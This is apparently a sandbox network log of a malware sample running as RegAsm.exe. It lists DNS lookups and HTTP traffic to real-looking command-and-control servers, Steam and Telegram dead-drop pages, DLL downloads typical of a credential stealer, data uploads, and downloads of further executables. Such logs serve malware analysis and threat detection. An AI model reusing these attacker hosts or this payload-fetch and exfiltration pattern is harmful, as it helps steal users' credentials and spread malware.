          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uwL8iNHItyOrbvAEcYYQi3JlweNWGH4CFqV55s%2B%2B89V3p%2Fuf8OldGlTYRp%2FCdsISFHHEEl4lF%2Ffit86fCJH9lj4WnwMerZH6h9lDdlWYxjwGHFs7iZ9xMGAMLsdJOU8ZqB0yIIo%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8cb396c5be64bedf-LHR
        • flag-us
          DNS
          129.205.67.172.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          129.205.67.172.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          bellykmrebk.site
          RegAsm.exe
          Remote address:
          8.8.8.8:53
          Request
          bellykmrebk.site
          IN A
          Response
        • flag-us
          DNS
          agentyanlark.site
          RegAsm.exe
          Remote address:
          8.8.8.8:53
          Request
          agentyanlark.site
          IN A
          Response
        • flag-us
          DNS
          writekdmsnu.site
          RegAsm.exe
          Remote address:
          8.8.8.8:53
          Request
          writekdmsnu.site
          IN A
          Response
        • flag-us
          DNS
          delaylacedmn.site
          RegAsm.exe
          Remote address:
          8.8.8.8:53
          Request
          delaylacedmn.site
          IN A
          Response
        • flag-us
          DNS
          steamcommunity.com
          RegAsm.exe
          Remote address:
          8.8.8.8:53
          Request
          steamcommunity.com
          IN A
          Response
          steamcommunity.com
          IN A
          104.82.234.109
        • flag-gb
          GET
          https://steamcommunity.com/profiles/76561199724331900
          RegAsm.exe
          Remote address:
          104.82.234.109:443
          Request
          GET /profiles/76561199724331900 HTTP/1.1
          Connection: Keep-Alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Host: steamcommunity.com
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Content-Type: text/html; charset=UTF-8
          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
          Expires: Mon, 26 Jul 1997 05:00:00 GMT
          Cache-Control: no-cache
          Date: Mon, 30 Sep 2024 10:39:25 GMT
          Content-Length: 34734
          Connection: keep-alive
          Set-Cookie: sessionid=1588e264885d1e512a49d9d7; Path=/; Secure; SameSite=None
          Set-Cookie: steamCountry=GB%7Ce15d564837abb028acb4e114150d704d; Path=/; Secure; HttpOnly; SameSite=None
        • flag-us
          DNS
          chaptermusu.store
          RegAsm.exe
          Remote address:
          8.8.8.8:53
          Request
          chaptermusu.store
          IN A
          Response
          chaptermusu.store
          IN A
          172.67.207.133
          chaptermusu.store
          IN A
          104.21.37.109
        • flag-us
          POST
          https://chaptermusu.store/api
          RegAsm.exe
          Remote address:
          172.67.207.133:443
          Request
          POST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: application/x-www-form-urlencoded
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 8
          Host: chaptermusu.store
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:26 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
          Set-Cookie: PHPSESSID=pj9vgi3aqbgf0t0rudptac908q; expires=Fri, 24 Jan 2025 04:26:05 GMT; Max-Age=9999999; path=/
          Expires: Thu, 19 Nov 1981 08:52:00 GMT
          Cache-Control: no-store, no-cache, must-revalidate
          Pragma: no-cache
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fNzAzxMryRpW%2BLsqBJCgJ2YcMLi%2F5KuuarxAO%2FXNZSLW3mIRH8rhkt%2Fwm87M%2BWDRPXfwCtJQH12C9%2BxL62gS0YE2ErfI6EmrOI5SCGHEHFo%2BdcID4AP3zTMA7I9u2wV8pxuNYQ%3D%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8cb396cdacc4d1f7-LHR
        • flag-us
          DNS
          169.1.21.104.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          169.1.21.104.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          109.234.82.104.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          109.234.82.104.in-addr.arpa
          IN PTR
          Response
          109.234.82.104.in-addr.arpa
          IN PTR
          a104-82-234-109deploystaticakamaitechnologiescom
        • flag-cz
          GET
          http://46.8.231.109/
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          GET / HTTP/1.1
          Host: 46.8.231.109
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:26 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Content-Length: 0
          Keep-Alive: timeout=5, max=100
          Connection: Keep-Alive
          Content-Type: text/html; charset=UTF-8
        • flag-cz
          POST
          http://46.8.231.109/c4754d4f680ead72.php
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          POST /c4754d4f680ead72.php HTTP/1.1
          Content-Type: multipart/form-data; boundary=----CBGHCAKKFBGDHJJJKECF
          Host: 46.8.231.109
          Content-Length: 214
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:26 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Vary: Accept-Encoding
          Content-Length: 180
          Keep-Alive: timeout=5, max=99
          Connection: Keep-Alive
          Content-Type: text/html; charset=UTF-8
        • flag-cz
          POST
          http://46.8.231.109/c4754d4f680ead72.php
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          POST /c4754d4f680ead72.php HTTP/1.1
          Content-Type: multipart/form-data; boundary=----KKFCFBKFCFBFIDGCGDHJ
          Host: 46.8.231.109
          Content-Length: 268
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:26 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Vary: Accept-Encoding
          Content-Length: 1520
          Keep-Alive: timeout=5, max=98
          Connection: Keep-Alive
          Content-Type: text/html; charset=UTF-8
        • flag-cz
          POST
          http://46.8.231.109/c4754d4f680ead72.php
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          POST /c4754d4f680ead72.php HTTP/1.1
          Content-Type: multipart/form-data; boundary=----DHIEHIIEHIEHJKEBKEHJ
          Host: 46.8.231.109
          Content-Length: 267
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:26 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Vary: Accept-Encoding
          Content-Length: 7116
          Keep-Alive: timeout=5, max=97
          Connection: Keep-Alive
          Content-Type: text/html; charset=UTF-8
        • flag-cz
          POST
          http://46.8.231.109/c4754d4f680ead72.php
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          POST /c4754d4f680ead72.php HTTP/1.1
          Content-Type: multipart/form-data; boundary=----BKFHCGIDBAAFHIDHDAAE
          Host: 46.8.231.109
          Content-Length: 268
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:26 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Vary: Accept-Encoding
          Content-Length: 108
          Keep-Alive: timeout=5, max=96
          Connection: Keep-Alive
          Content-Type: text/html; charset=UTF-8
        • flag-cz
          POST
          http://46.8.231.109/c4754d4f680ead72.php
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          POST /c4754d4f680ead72.php HTTP/1.1
          Content-Type: multipart/form-data; boundary=----BFCFBKKKFHCFHJKFIIEH
          Host: 46.8.231.109
          Content-Length: 4739
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:27 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Content-Length: 0
          Keep-Alive: timeout=5, max=95
          Connection: Keep-Alive
          Content-Type: text/html; charset=UTF-8
        • flag-cz
          GET
          http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dll
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1
          Host: 46.8.231.109
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:27 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT
          ETag: "10e436-5e7eeebed8d80"
          Accept-Ranges: bytes
          Content-Length: 1106998
          Content-Type: application/x-msdos-program
        • flag-cz
          POST
          http://46.8.231.109/c4754d4f680ead72.php
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          POST /c4754d4f680ead72.php HTTP/1.1
          Content-Type: multipart/form-data; boundary=----BGDBAKFCFHCGDGCBAAKF
          Host: 46.8.231.109
          Content-Length: 363
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:28 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Content-Length: 0
          Keep-Alive: timeout=5, max=93
          Connection: Keep-Alive
          Content-Type: text/html; charset=UTF-8
        • flag-cz
          POST
          http://46.8.231.109/c4754d4f680ead72.php
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          POST /c4754d4f680ead72.php HTTP/1.1
          Content-Type: multipart/form-data; boundary=----EHIJJDGDHDGDAKFIECFI
          Host: 46.8.231.109
          Content-Length: 363
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:28 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Content-Length: 0
          Keep-Alive: timeout=5, max=92
          Connection: Keep-Alive
          Content-Type: text/html; charset=UTF-8
        • flag-cz
          GET
          http://46.8.231.109/1309cdeb8f4c8736/freebl3.dll
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1
          Host: 46.8.231.109
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:28 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
          ETag: "a7550-5e7ebd4425100"
          Accept-Ranges: bytes
          Content-Length: 685392
          Content-Type: application/x-msdos-program
        • flag-cz
          GET
          http://46.8.231.109/1309cdeb8f4c8736/mozglue.dll
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1
          Host: 46.8.231.109
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:28 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
          ETag: "94750-5e7ebd4425100"
          Accept-Ranges: bytes
          Content-Length: 608080
          Content-Type: application/x-msdos-program
        • flag-cz
          GET
          http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1
          Host: 46.8.231.109
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:29 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
          ETag: "6dde8-5e7ebd4425100"
          Accept-Ranges: bytes
          Content-Length: 450024
          Content-Type: application/x-msdos-program
        • flag-cz
          GET
          http://46.8.231.109/1309cdeb8f4c8736/nss3.dll
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1
          Host: 46.8.231.109
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:29 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
          ETag: "1f3950-5e7ebd4425100"
          Accept-Ranges: bytes
          Content-Length: 2046288
          Content-Type: application/x-msdos-program
        • flag-cz
          GET
          http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1
          Host: 46.8.231.109
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:31 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
          ETag: "3ef50-5e7ebd4425100"
          Accept-Ranges: bytes
          Content-Length: 257872
          Content-Type: application/x-msdos-program
        • flag-cz
          GET
          http://46.8.231.109/1309cdeb8f4c8736/vcruntime140.dll
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1
          Host: 46.8.231.109
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:31 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
          ETag: "13bf0-5e7ebd4425100"
          Accept-Ranges: bytes
          Content-Length: 80880
          Content-Type: application/x-msdos-program
        • flag-cz
          POST
          http://46.8.231.109/c4754d4f680ead72.php
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          POST /c4754d4f680ead72.php HTTP/1.1
          Content-Type: multipart/form-data; boundary=----GHDAKKJJJKJKECBGCGDA
          Host: 46.8.231.109
          Content-Length: 947
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:31 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Content-Length: 0
          Keep-Alive: timeout=5, max=85
          Connection: Keep-Alive
          Content-Type: text/html; charset=UTF-8
        • flag-cz
          POST
          http://46.8.231.109/c4754d4f680ead72.php
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          POST /c4754d4f680ead72.php HTTP/1.1
          Content-Type: multipart/form-data; boundary=----KEGCBFCBFBKFHIECAFCF
          Host: 46.8.231.109
          Content-Length: 267
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:31 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Vary: Accept-Encoding
          Content-Length: 2408
          Keep-Alive: timeout=5, max=84
          Connection: Keep-Alive
          Content-Type: text/html; charset=UTF-8
        • flag-cz
          POST
          http://46.8.231.109/c4754d4f680ead72.php
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          POST /c4754d4f680ead72.php HTTP/1.1
          Content-Type: multipart/form-data; boundary=----KKFCFBKFCFBFIDGCGDHJ
          Host: 46.8.231.109
          Content-Length: 265
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:31 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Content-Length: 0
          Keep-Alive: timeout=5, max=83
          Connection: Keep-Alive
          Content-Type: text/html; charset=UTF-8
        • flag-cz
          POST
          http://46.8.231.109/c4754d4f680ead72.php
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          POST /c4754d4f680ead72.php HTTP/1.1
          Content-Type: multipart/form-data; boundary=----HJKECAAAFHJECAAAEBFC
          Host: 46.8.231.109
          Content-Length: 363
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:31 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Content-Length: 0
          Keep-Alive: timeout=5, max=82
          Connection: Keep-Alive
          Content-Type: text/html; charset=UTF-8
        • flag-cz
          POST
          http://46.8.231.109/c4754d4f680ead72.php
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          POST /c4754d4f680ead72.php HTTP/1.1
          Content-Type: multipart/form-data; boundary=----IDBKFHJEBAAEBGDGDBFB
          Host: 46.8.231.109
          Content-Length: 272
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:31 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Vary: Accept-Encoding
          Content-Length: 184
          Keep-Alive: timeout=5, max=81
          Connection: Keep-Alive
          Content-Type: text/html; charset=UTF-8
        • flag-cz
          POST
          http://46.8.231.109/c4754d4f680ead72.php
          RegAsm.exe
          Remote address:
          46.8.231.109:80
          Request
          POST /c4754d4f680ead72.php HTTP/1.1
          Content-Type: multipart/form-data; boundary=----JKKECBGIIIEBGCBGIDHD
          Host: 46.8.231.109
          Content-Length: 272
          Connection: Keep-Alive
          Cache-Control: no-cache
        • flag-us
          DNS
          cowod.hopto.org
          RegAsm.exe
          Remote address:
          8.8.8.8:53
          Request
          cowod.hopto.org
          IN A
          Response
          cowod.hopto.org
          IN A
          45.132.206.251
        • flag-ru
          POST
          http://cowod.hopto.org/
          RegAsm.exe
          Remote address:
          45.132.206.251:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----HCAEBFBKKJDHIDHIDBAE
          Host: cowod.hopto.org
          Content-Length: 2709
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: openresty
          Date: Mon, 30 Sep 2024 10:39:27 GMT
          Content-Type: text/html; charset=UTF-8
          Content-Length: 0
          Connection: keep-alive
          X-Served-By: cowod.hopto.org
        • flag-nl
          GET
          https://t.me/jamsemlg
          RegAsm.exe
          Remote address:
          149.154.167.99:443
          Request
          GET /jamsemlg HTTP/1.1
          Host: t.me
          Connection: Keep-Alive
          Cache-Control: no-cache
          Cookie: stel_ssid=a24a0cfbc4f6be6b71_11082954543017583655
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0
          Date: Mon, 30 Sep 2024 10:39:27 GMT
          Content-Type: text/html; charset=utf-8
          Content-Length: 12382
          Connection: keep-alive
          Pragma: no-cache
          Cache-control: no-store
          X-Frame-Options: ALLOW-FROM https://web.telegram.org
          Content-Security-Policy: frame-ancestors https://web.telegram.org
          Strict-Transport-Security: max-age=35768000
        • flag-us
          DNS
          109.231.8.46.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          109.231.8.46.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          133.207.67.172.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          133.207.67.172.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          251.206.132.45.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          251.206.132.45.in-addr.arpa
          IN PTR
          Response
        • flag-nl
          GET
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          GET / HTTP/1.1
          Host: urusvisa.com
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:28 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-nl
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----AAKKFHCFIECAAAKEGCFI
          Host: urusvisa.com
          Content-Length: 256
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:28 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-nl
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----HJKECAAAFHJECAAAEBFC
          Host: urusvisa.com
          Content-Length: 331
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:29 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-nl
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----HCFBKKEBKEBGIDHIEHCF
          Host: urusvisa.com
          Content-Length: 331
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:29 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-nl
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----KEGCBFCBFBKFHIECAFCF
          Host: urusvisa.com
          Content-Length: 332
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:29 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-nl
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----JEGHCBAFBFHIIECBKFCG
          Host: urusvisa.com
          Content-Length: 4765
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:30 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-nl
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----FIEGCBKEGCFCBFIDBFII
          Host: urusvisa.com
          Content-Length: 437
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:31 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-us
          DNS
          22.249.124.192.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          22.249.124.192.in-addr.arpa
          IN PTR
          Response
          22.249.124.192.in-addr.arpa
          IN PTR
          cloudproxy10022sucurinet
        • flag-ch
          GET
          http://files.veritas.org.ng/ldms/66fa2afc5abea_vasd.exe
          RegAsm.exe
          Remote address:
          147.45.44.104:80
          Request
          GET /ldms/66fa2afc5abea_vasd.exe HTTP/1.1
          Host: files.veritas.org.ng
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:32 GMT
          Content-Type: application/octet-stream
          Content-Length: 414248
          Last-Modified: Mon, 30 Sep 2024 04:37:16 GMT
          Connection: keep-alive
          Keep-Alive: timeout=120
          ETag: "66fa2afc-65228"
          X-Content-Type-Options: nosniff
          Accept-Ranges: bytes
        • flag-ch
          GET
          http://files.veritas.org.ng/ldms/66fa2b049020f_ldnf.exe
          RegAsm.exe
          Remote address:
          147.45.44.104:80
          Request
          GET /ldms/66fa2b049020f_ldnf.exe HTTP/1.1
          Host: files.veritas.org.ng
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:32 GMT
          Content-Type: application/octet-stream
          Content-Length: 380456
          Last-Modified: Mon, 30 Sep 2024 04:37:24 GMT
          Connection: keep-alive
          Keep-Alive: timeout=120
          ETag: "66fa2b04-5ce28"
          X-Content-Type-Options: nosniff
          Accept-Ranges: bytes
        • flag-us
          POST
          https://possiwreeste.site/api
          RegAsm.exe
          Remote address:
          172.67.205.129:443
          Request
          POST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: application/x-www-form-urlencoded
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 8
          Host: possiwreeste.site
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:34 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
          Set-Cookie: PHPSESSID=p5sq49in5ofuraqkg9nfv9mrc2; expires=Fri, 24 Jan 2025 04:26:13 GMT; Max-Age=9999999; path=/
          Expires: Thu, 19 Nov 1981 08:52:00 GMT
          Cache-Control: no-store, no-cache, must-revalidate
          Pragma: no-cache
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qqqPdnfNvS88zpSJ5rHFGLdbNAXYdlNw2DJgAdbS%2FdqiCTTS3R2ak7W%2BZ%2FcJXynNZfi3e44ttNp61G99PXsBWpcZODeG%2FjqTfYnVM%2Fq%2BcLDfBrM4ttAo9li1FxWhBuysfozthg%3D%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8cb396fd9f74cd21-LHR
          alt-svc: h3=":443"; ma=86400
        • flag-us
          POST
          https://possiwreeste.site/api
          RegAsm.exe
          Remote address:
          172.67.205.129:443
          Request
          POST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: application/x-www-form-urlencoded
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 8
          Host: possiwreeste.site
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:34 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
          Set-Cookie: PHPSESSID=q2pcrrrhhceldpf7uedqgc5295; expires=Fri, 24 Jan 2025 04:26:13 GMT; Max-Age=9999999; path=/
          Expires: Thu, 19 Nov 1981 08:52:00 GMT
          Cache-Control: no-store, no-cache, must-revalidate
          Pragma: no-cache
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VNTmZhZhQKKhj%2F%2Fw9KZXul6adaZlBrAnFjRLiMvUTS3zI4DyBAsZkTIROynHDF6Rr%2BIVjf7KoNt9Ip5Vhw5fZdRjF7LOF7%2BcEgcFnngZC4JE%2FUK5ZHDUwYFNZlq17gDnr1XRXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8cb396ff9a8bcd21-LHR
          alt-svc: h3=":443"; ma=86400
        • flag-us
          DNS
          famikyjdiag.site
          RegAsm.exe
          Remote address:
          8.8.8.8:53
          Request
          famikyjdiag.site
          IN A
          Response
        • flag-us
          DNS
          commandejorsk.site
          RegAsm.exe
          Remote address:
          8.8.8.8:53
          Request
          commandejorsk.site
          IN A
          Response
        • flag-us
          POST
          https://underlinemdsj.site/api
          RegAsm.exe
          Remote address:
          104.21.1.169:443
          Request
          POST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: application/x-www-form-urlencoded
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 8
          Host: underlinemdsj.site
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:34 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
          Set-Cookie: PHPSESSID=takl526ts02jt1cadqp777bcmp; expires=Fri, 24 Jan 2025 04:26:13 GMT; Max-Age=9999999; path=/
          Expires: Thu, 19 Nov 1981 08:52:00 GMT
          Cache-Control: no-store, no-cache, must-revalidate
          Pragma: no-cache
